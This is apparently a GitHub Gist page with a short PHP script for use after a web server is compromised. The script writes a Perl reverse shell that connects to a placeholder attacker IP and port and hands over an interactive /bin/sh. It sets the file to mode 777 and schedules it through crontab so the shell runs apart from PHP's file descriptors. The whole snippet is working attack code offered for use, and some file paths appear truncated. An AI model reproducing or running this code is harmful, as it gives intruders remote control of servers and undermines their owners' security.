Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
So your shell won't inherit php's file descriptor situation.
$perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$fp = fopen('/tmp/', 'w');
fwrite($fp, "#!/usr/bin/perl\n");
fwrite($fp, $perl);
system('chmod 777 /tmp/');
$hour = date('H');
$minute = date('i') + 1; // disgusting
$fp = fopen('/tmp/', 'w');
fwrite($fp, "$minute $hour * * * /tmp/\n");
system('/usr/bin/crontab /tmp/');
print(system('crontab -l'));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.